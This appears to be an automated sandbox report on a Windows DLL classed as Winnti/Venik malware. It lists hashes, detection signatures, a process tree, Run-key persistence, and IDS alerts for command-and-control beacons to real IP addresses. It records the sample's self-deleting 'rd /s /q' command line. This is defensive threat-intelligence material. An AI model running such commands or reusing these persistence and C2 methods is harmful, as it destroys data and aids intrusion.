Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2JSGOlbNym.dll

Overview

General Information

Sample name:2JSGOlbNym.dll
renamed because original name is a hash value
Original sample name:bc3a8653c59edabf91eb545f7d9dcf818f3ef003.dll
Analysis ID:1578341
MD5:e3f13188806c9a2ecabf5eab0cf7dc5f
SHA1:bc3a8653c59edabf91eb545f7d9dcf818f3ef003
SHA256:ad2003c10fcffe449f3b5bd445dca19d789eac82d64f0b764104d7b6d0fb955f
Tags:dlluser-NDA0E
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Queries disk data (e.g. SMART data)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to communicate with device drivers
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1612 cmdline: loaddll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2864 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2168 cmdline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 2372 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 3124 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 1232 cmdline: rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObject MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6136 cmdline: rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4356 cmdline: rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 4868 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 3648 cmdline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 3596 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 5572 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 3800 cmdline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3732 cmdline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 5800 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 4900 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6044 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 4592 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 5536 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 416 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
2JSGOlbNym.dllWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x22b15:$x1: cracked by ximo
  • 0x25aec:$x1: cracked by ximo

Unpacked PEs

SourceRuleDescriptionAuthorStrings
19.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x3aa8c:$x1: cracked by ximo
  • 0x3ab44:$x1: cracked by ximo
  • 0x3abfc:$x1: cracked by ximo
  • 0x3acb4:$x1: cracked by ximo
  • 0x3ad6c:$x1: cracked by ximo
  • 0x3ae24:$x1: cracked by ximo
  • 0x3aedc:$x1: cracked by ximo
  • 0x3af94:$x1: cracked by ximo
  • 0x5ed5e:$x1: cracked by ximo
  • 0x61d35:$x1: cracked by ximo
11.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x3aa8c:$x1: cracked by ximo
  • 0x3ab44:$x1: cracked by ximo
  • 0x3abfc:$x1: cracked by ximo
  • 0x3acb4:$x1: cracked by ximo
  • 0x3ad6c:$x1: cracked by ximo
  • 0x3ae24:$x1: cracked by ximo
  • 0x3aedc:$x1: cracked by ximo
  • 0x3af94:$x1: cracked by ximo
  • 0x5ed5e:$x1: cracked by ximo
  • 0x61d35:$x1: cracked by ximo
4.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x3aa8c:$x1: cracked by ximo
  • 0x3ab44:$x1: cracked by ximo
  • 0x3abfc:$x1: cracked by ximo
  • 0x3acb4:$x1: cracked by ximo
  • 0x3ad6c:$x1: cracked by ximo
  • 0x3ae24:$x1: cracked by ximo
  • 0x3aedc:$x1: cracked by ximo
  • 0x3af94:$x1: cracked by ximo
  • 0x5ed5e:$x1: cracked by ximo
  • 0x61d35:$x1: cracked by ximo

Sigma Signatures

System Summary

barindex
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1232, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COAPI

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:44:43.735600+010028032742Potentially Bad Traffic192.168.2.1149726116.133.8.9280TCP
2024-12-19T15:44:45.672388+010028032742Potentially Bad Traffic192.168.2.1149729116.133.8.9280TCP
2024-12-19T15:44:51.735632+010028032742Potentially Bad Traffic192.168.2.1149736116.133.8.9280TCP
2024-12-19T15:44:55.876769+010028032742Potentially Bad Traffic192.168.2.1149739116.133.8.9280TCP
2024-12-19T15:44:57.873519+010028032742Potentially Bad Traffic192.168.2.1149742116.133.8.9280TCP
2024-12-19T15:45:02.039906+010028032742Potentially Bad Traffic192.168.2.1149748116.133.8.9280TCP
2024-12-19T15:45:05.977914+010028032742Potentially Bad Traffic192.168.2.1149752116.133.8.9280TCP
2024-12-19T15:45:09.958806+010028032742Potentially Bad Traffic192.168.2.1149756116.133.8.9280TCP
2024-12-19T15:45:14.117837+010028032742Potentially Bad Traffic192.168.2.1149760116.133.8.9280TCP
2024-12-19T15:45:20.048222+010028032742Potentially Bad Traffic192.168.2.1149764116.133.8.9280TCP
2024-12-19T15:45:22.017200+010028032742Potentially Bad Traffic192.168.2.1149766116.133.8.9280TCP
2024-12-19T15:45:26.194962+010028032742Potentially Bad Traffic192.168.2.1149773116.133.8.9280TCP
2024-12-19T15:45:30.985896+010028032742Potentially Bad Traffic192.168.2.1149777116.133.8.9280TCP
2024-12-19T15:45:34.273735+010028032742Potentially Bad Traffic192.168.2.1149781116.133.8.9280TCP
2024-12-19T15:45:38.289440+010028032742Potentially Bad Traffic192.168.2.1149785116.133.8.9280TCP
2024-12-19T15:45:43.137902+010028032742Potentially Bad Traffic192.168.2.1149789116.133.8.9280TCP
2024-12-19T15:45:48.454782+010028032742Potentially Bad Traffic192.168.2.1149793116.133.8.9280TCP
2024-12-19T15:45:52.606086+010028032742Potentially Bad Traffic192.168.2.1149797116.133.8.9280TCP
2024-12-19T15:45:56.751441+010028032742Potentially Bad Traffic192.168.2.1149800116.133.8.9280TCP
2024-12-19T15:46:00.871330+010028032742Potentially Bad Traffic192.168.2.1149802116.133.8.9280TCP
2024-12-19T15:46:02.961800+010028032742Potentially Bad Traffic192.168.2.1149805116.133.8.9280TCP
2024-12-19T15:46:06.978141+010028032742Potentially Bad Traffic192.168.2.1149809116.133.8.9280TCP
2024-12-19T15:46:10.975339+010028032742Potentially Bad Traffic192.168.2.1149815116.133.8.9280TCP
2024-12-19T15:46:17.492889+010028032742Potentially Bad Traffic192.168.2.1149820116.133.8.9280TCP
2024-12-19T15:46:19.448678+010028032742Potentially Bad Traffic192.168.2.1149823116.133.8.9280TCP
2024-12-19T15:46:25.306220+010028032742Potentially Bad Traffic192.168.2.1149828116.133.8.9280TCP
2024-12-19T15:46:28.410219+010028032742Potentially Bad Traffic192.168.2.1149830116.133.8.9280TCP
2024-12-19T15:46:32.408255+010028032742Potentially Bad Traffic192.168.2.1149837116.133.8.9280TCP
2024-12-19T15:46:35.873635+010028032742Potentially Bad Traffic192.168.2.1149841116.133.8.9280TCP
2024-12-19T15:46:39.809292+010028032742Potentially Bad Traffic192.168.2.1149844116.133.8.9280TCP
2024-12-19T15:46:42.064075+010028032742Potentially Bad Traffic192.168.2.1149848116.133.8.9280TCP
2024-12-19T15:46:44.107927+010028032742Potentially Bad Traffic192.168.2.1149852116.133.8.9280TCP
2024-12-19T15:46:48.311762+010028032742Potentially Bad Traffic192.168.2.1149856116.133.8.9280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:44:33.497786+010028032702Potentially Bad Traffic192.168.2.1149706107.163.56.11018530TCP
2024-12-19T15:44:35.689380+010028032702Potentially Bad Traffic192.168.2.1149705107.163.56.23118530TCP
2024-12-19T15:44:43.735527+010028032702Potentially Bad Traffic192.168.2.1149722107.163.56.23218963TCP
2024-12-19T15:44:43.735567+010028032702Potentially Bad Traffic192.168.2.1149723107.163.56.23218963TCP
2024-12-19T15:44:47.735838+010028032702Potentially Bad Traffic192.168.2.1149728107.163.56.23218963TCP
2024-12-19T15:44:47.735838+010028032702Potentially Bad Traffic192.168.2.1149730107.163.56.23218963TCP
2024-12-19T15:44:51.735671+010028032702Potentially Bad Traffic192.168.2.1149733107.163.56.23218963TCP
2024-12-19T15:44:51.735763+010028032702Potentially Bad Traffic192.168.2.1149734107.163.56.23218963TCP
2024-12-19T15:44:55.876691+010028032702Potentially Bad Traffic192.168.2.1149737107.163.56.23218963TCP
2024-12-19T15:44:55.876728+010028032702Potentially Bad Traffic192.168.2.1149738107.163.56.23218963TCP
2024-12-19T15:45:00.001277+010028032702Potentially Bad Traffic192.168.2.1149740107.163.56.23218963TCP
2024-12-19T15:45:00.001293+010028032702Potentially Bad Traffic192.168.2.1149741107.163.56.23218963TCP
2024-12-19T15:45:04.001669+010028032702Potentially Bad Traffic192.168.2.1149746107.163.56.23218963TCP
2024-12-19T15:45:04.001696+010028032702Potentially Bad Traffic192.168.2.1149747107.163.56.23218963TCP
2024-12-19T15:45:08.020764+010028032702Potentially Bad Traffic192.168.2.1149750107.163.56.23218963TCP
2024-12-19T15:45:08.020792+010028032702Potentially Bad Traffic192.168.2.1149751107.163.56.23218963TCP
2024-12-19T15:45:12.016757+010028032702Potentially Bad Traffic192.168.2.1149754107.163.56.23218963TCP
2024-12-19T15:45:12.016797+010028032702Potentially Bad Traffic192.168.2.1149755107.163.56.23218963TCP
2024-12-19T15:45:16.032665+010028032702Potentially Bad Traffic192.168.2.1149759107.163.56.23218963TCP
2024-12-19T15:45:16.032697+010028032702Potentially Bad Traffic192.168.2.1149758107.163.56.23218963TCP
2024-12-19T15:45:20.048172+010028032702Potentially Bad Traffic192.168.2.1149762107.163.56.23218963TCP
2024-12-19T15:45:20.048204+010028032702Potentially Bad Traffic192.168.2.1149763107.163.56.23218963TCP
2024-12-19T15:45:24.174267+010028032702Potentially Bad Traffic192.168.2.1149767107.163.56.23218963TCP
2024-12-19T15:45:24.174362+010028032702Potentially Bad Traffic192.168.2.1149765107.163.56.23218963TCP
2024-12-19T15:45:28.298071+010028032702Potentially Bad Traffic192.168.2.1149771107.163.56.23218963TCP
2024-12-19T15:45:28.298130+010028032702Potentially Bad Traffic192.168.2.1149772107.163.56.23218963TCP
2024-12-19T15:45:32.322598+010028032702Potentially Bad Traffic192.168.2.1149775107.163.56.23218963TCP
2024-12-19T15:45:32.322671+010028032702Potentially Bad Traffic192.168.2.1149776107.163.56.23218963TCP
2024-12-19T15:45:36.314726+010028032702Potentially Bad Traffic192.168.2.1149779107.163.56.23218963TCP
2024-12-19T15:45:36.314797+010028032702Potentially Bad Traffic192.168.2.1149780107.163.56.23218963TCP
2024-12-19T15:45:40.317140+010028032702Potentially Bad Traffic192.168.2.1149784107.163.56.23218963TCP
2024-12-19T15:45:40.317164+010028032702Potentially Bad Traffic192.168.2.1149783107.163.56.23218963TCP
2024-12-19T15:45:44.438893+010028032702Potentially Bad Traffic192.168.2.1149788107.163.56.23218963TCP
2024-12-19T15:45:44.439103+010028032702Potentially Bad Traffic192.168.2.1149787107.163.56.23218963TCP
2024-12-19T15:45:48.454799+010028032702Potentially Bad Traffic192.168.2.1149794107.163.56.23218963TCP
2024-12-19T15:45:48.454799+010028032702Potentially Bad Traffic192.168.2.1149792107.163.56.23218963TCP
2024-12-19T15:45:52.605958+010028032702Potentially Bad Traffic192.168.2.1149796107.163.56.23218963TCP
2024-12-19T15:45:52.606082+010028032702Potentially Bad Traffic192.168.2.1149795107.163.56.23218963TCP
2024-12-19T15:45:56.751358+010028032702Potentially Bad Traffic192.168.2.1149798107.163.56.23218963TCP
2024-12-19T15:45:56.751404+010028032702Potentially Bad Traffic192.168.2.1149799107.163.56.23218963TCP
2024-12-19T15:46:00.871302+010028032702Potentially Bad Traffic192.168.2.1149801107.163.56.23218963TCP
2024-12-19T15:46:00.871372+010028032702Potentially Bad Traffic192.168.2.1149803107.163.56.23218963TCP
2024-12-19T15:46:05.001547+010028032702Potentially Bad Traffic192.168.2.1149804107.163.56.23218963TCP
2024-12-19T15:46:05.001579+010028032702Potentially Bad Traffic192.168.2.1149806107.163.56.23218963TCP
2024-12-19T15:46:09.017360+010028032702Potentially Bad Traffic192.168.2.1149808107.163.56.23218963TCP
2024-12-19T15:46:09.017413+010028032702Potentially Bad Traffic192.168.2.1149810107.163.56.23218963TCP
2024-12-19T15:46:13.146950+010028032702Potentially Bad Traffic192.168.2.1149813107.163.56.23218963TCP
2024-12-19T15:46:13.146988+010028032702Potentially Bad Traffic192.168.2.1149814107.163.56.23218963TCP
2024-12-19T15:46:17.492707+010028032702Potentially Bad Traffic192.168.2.1149818107.163.56.23218963TCP
2024-12-19T15:46:17.492956+010028032702Potentially Bad Traffic192.168.2.1149819107.163.56.23218963TCP
2024-12-19T15:46:21.518675+010028032702Potentially Bad Traffic192.168.2.1149822107.163.56.23218963TCP
2024-12-19T15:46:21.518681+010028032702Potentially Bad Traffic192.168.2.1149821107.163.56.23218963TCP
2024-12-19T15:46:25.658559+010028032702Potentially Bad Traffic192.168.2.1149825107.163.56.23218963TCP
2024-12-19T15:46:25.658612+010028032702Potentially Bad Traffic192.168.2.1149827107.163.56.23218963TCP
2024-12-19T15:46:29.782777+010028032702Potentially Bad Traffic192.168.2.1149832107.163.56.23218963TCP
2024-12-19T15:46:29.782813+010028032702Potentially Bad Traffic192.168.2.1149831107.163.56.23218963TCP
2024-12-19T15:46:33.798470+010028032702Potentially Bad Traffic192.168.2.1149836107.163.56.23218963TCP
2024-12-19T15:46:33.798506+010028032702Potentially Bad Traffic192.168.2.1149835107.163.56.23218963TCP
2024-12-19T15:46:37.814093+010028032702Potentially Bad Traffic192.168.2.1149839107.163.56.23218963TCP
2024-12-19T15:46:37.814098+010028032702Potentially Bad Traffic192.168.2.1149840107.163.56.23218963TCP
2024-12-19T15:46:41.527427+010028032702Potentially Bad Traffic192.168.2.1149845107.163.56.23218963TCP
2024-12-19T15:46:41.527474+010028032702Potentially Bad Traffic192.168.2.1149843107.163.56.23218963TCP
2024-12-19T15:46:42.064117+010028032702Potentially Bad Traffic192.168.2.1149849107.163.56.23218963TCP
2024-12-19T15:46:42.064125+010028032702Potentially Bad Traffic192.168.2.1149847107.163.56.23218963TCP
2024-12-19T15:46:46.220249+010028032702Potentially Bad Traffic192.168.2.1149850107.163.56.23218963TCP
2024-12-19T15:46:46.220304+010028032702Potentially Bad Traffic192.168.2.1149851107.163.56.23218963TCP
2024-12-19T15:46:50.349737+010028032702Potentially Bad Traffic192.168.2.1149855107.163.56.23218963TCP
2024-12-19T15:46:50.349757+010028032702Potentially Bad Traffic192.168.2.1149854107.163.56.23218963TCP
2024-12-19T15:47:12.377324+010028032702Potentially Bad Traffic192.168.2.1149859107.163.56.23218963TCP
2024-12-19T15:47:12.516866+010028032702Potentially Bad Traffic192.168.2.1149860107.163.56.23218963TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:44:36.833681+010028124061Malware Command and Control Activity Detected192.168.2.1149718107.163.56.2516658TCP
2024-12-19T15:44:58.986252+010028124061Malware Command and Control Activity Detected192.168.2.1149745107.163.56.2516658TCP
2024-12-19T15:45:21.291466+010028124061Malware Command and Control Activity Detected192.168.2.1149769107.163.56.2516658TCP
2024-12-19T15:45:43.513998+010028124061Malware Command and Control Activity Detected192.168.2.1149791107.163.56.2516658TCP
2024-12-19T15:46:05.655037+010028124061Malware Command and Control Activity Detected192.168.2.1149811107.163.56.2516658TCP
2024-12-19T15:46:27.764083+010028124061Malware Command and Control Activity Detected192.168.2.1149833107.163.56.2516658TCP
2024-12-19T15:46:49.914765+010028124061Malware Command and Control Activity Detected192.168.2.1149858107.163.56.2516658TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:44:35.689380+010028124071Malware Command and Control Activity Detected192.168.2.1149705107.163.56.23118530TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 2JSGOlbNym.dllAvira: detected
Multi AV Scanner detection for submitted file
Source: 2JSGOlbNym.dllReversingLabs: Detection: 89%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 2JSGOlbNym.dllJoe Sandbox ML: detected
Source: 2JSGOlbNym.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49816 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49824 version: TLS 1.2
Source: Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2351563967.0000000003488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*V source: rundll32.exe, 00000004.00000003.2331092028.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*k source: rundll32.exe, 00000004.00000003.2331092028.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: rundll32.exe, 00000004.00000003.2298221763.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\*.*.*I source: rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: rundll32.exe, 00000004.00000003.2272862369.000000000342C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2474003270.0000000003488000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2353062409.0000000003488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*e source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*T7 source: rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948360391.000000000346D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2272781039.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000004.00000003.2271634293.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271351006.0000000003448000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49718 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49745 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812407 - Severity 1 - ETPRO MALWARE Win32/Venik HTTP CnC Beacon : 192.168.2.11:49705 -> 107.163.56.231:18530
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49791 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49833 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49858 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49811 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49769 -> 107.163.56.251:6658
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.232 18963Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.231 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.110 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.251 6658Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 116.133.8.92 443Jump to behavior
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 107.163.56.232 ports 18963,1,3,6,8,9
Source: global trafficTCP traffic: 107.163.56.231 ports 18530,0,1,3,5,8
Source: global trafficTCP traffic: 107.163.56.110 ports 18530,0,1,3,5,8
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 18963
